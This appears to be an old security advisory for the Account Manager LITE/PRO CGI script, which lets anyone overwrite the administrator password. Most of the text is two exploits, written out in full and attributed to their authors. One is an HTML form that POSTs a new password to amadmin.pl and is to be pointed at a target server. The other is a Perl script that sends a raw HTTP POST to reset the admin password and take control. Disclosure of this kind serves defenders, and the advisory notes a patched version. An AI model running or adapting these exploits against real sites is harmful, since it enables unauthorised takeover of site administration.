|
Vulnerability Account Manager CGI Affected ALL including LITE and PRO haven't been able to test ENTERPRISE Description 'n30' found following. The Script allows any remote user access to the Administration Control Panel through overwriting the Admin Password with one of their own making. This is possible since the script parses the inputted data with total disregard for whether the current userhas Admin priveleges. Therefore calling www.server.com/cgibin/amadmin.pl?setpasswd using a POST command would allow the password to be altered. Using this exploit would give a remote user access to add and remove users from protected areas of your website perphaps to other more interesting CGI's. Here comes the exploit: <FORM ACTION="http://www.decodeco.com/cgi-bin/acctman/amadmin.pl" METHOD="POST"><CENTER><BR> <TABLE BORDER="0" WIDTH="450"><TBODY><COLDEFS><COLDEF></COLDEFS><ROWS><TR><TD COLSTART="1"><P><B><FONT FACE="verdana, arial, helvetica"><FONT COLOR="#400000">Account Manager LITE/PRO</FONT>: Password Exploit!</FONT></B></P> <CENTER><FONT FACE="verdana, arial, helvetica"><FONTCOLOR="#400000">n30</FONT></B></P></CENTER> <P><FONT SIZE="-1" FACE="verdana, arial, helvetica">Please enter your password twice. Once to set it, and once to confirm it.</FONT></P> <CENTER><TABLE BORDER="0"><TBODY><COLDEFS><COLDEF><COLDEF></COLDEFS><ROWS><TR ><TD ALIGN="RIGHT" COLSTART="1"><INPUT TYPE="PASSWORD" NAME="pwd"></TD><TD COLSTART="2"><FONT SIZE="-2" FACE="verdana, arial, helvetica">password</FONT></TD></TR> <TR><TD ALIGN="RIGHT" COLSTART="1"><INPUT TYPE="PASSWORD" NAME="pwd2"></TD><TD COLSTART="2"><FONT SIZE="-2" FACE="verdana, arial, helvetica">confirmation</FONT></TD></TR> <TR><TD ALIGN="CENTER" COLSTART="1"><BR><INPUT TYPE="SUBMIT" NAME="setpwd" VALUE=" Set Password "></TD><TD COLSTART="2"><BR></TD></TR></ROWS></TBODY></TABLE></CENTER><CENTER><TABLE BORDER="0" WIDTH="400"><TBODY><COLDEFS><COLDEF></COLDEFS><ROWS><TR><TD COLSTART="1"><HR SIZE="1"></TD></TR><TR><TD ALIGN="CENTER" COLSTART="1"><FONT SIZE="-2" FACE="verdana, arial, helvetica"><B>Account Manager LITE/PRO Admin Passwerd Exploit </B></A></FONT></TD></TR></ROWS></TBODY></TABLE></CENTER></TD></TR></ROWS></TBODY></TABLE></CENTER> <CENTER><FONTSIZE="1" FACE="verdana, arial, helvetica"><B><BR> To Use Modify Source To Point to amadmin.pl on TARGET Server <BR><BR><a href="mailto:n30@alldas.de">mail-me</a></CENTER> </FORM> <!-- Shoutz to trib, axess and all who know me! --> Here is another: #!/usr/bin/perl -w ## Account Manager LITE 1.0x / cgi.elitehost.com ## This exploit let's you change the administrator ## password, and completely take controll. ## ## teleh0r@doglover.com / anno 2000 ## httpd://teleh0r.cjb.net use strict; use Socket; if (@ARGV < 2) { print("Usage: $0 <target> <newpass>\n"); exit(1); } my($target,$newpass,$crypt,$length,$command, $agent,$sploit,$iaddr,$paddr,$proto); ($target,$newpass) = @ARGV; $crypt = crypt($newpass, 'aa'); $length = 34 + length($newpass); print("\nRemote host: $target\n"); print("CGI-script: /cgi-bin/subscribe.pl\n"); print("New password: $newpass / $crypt\n\n"); $command = "pwd=$newpass&pwd2=$newpass&setpwd=++Set+Password++"; $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)"; # Note that POST /cgi-bin/amlite/amadmin.pl HTTP/1.0 # may have to be changed... $sploit= "POST /cgi-bin/amlite/amadmin.pl HTTP/1.0 Connection: close User-Agent: $agent Host: $target Content-type: application/x-www-form-urlencoded Content-length: $length $command"; $iaddr = inet_aton($target) || die("Error: $!\n"); $paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n"); close(SOCKET); sleep(2); print("Surf to http://$target/cgi-bin/amlite/amadmin.pl\n"); exit(0); Solution Already available see website, download version is patched.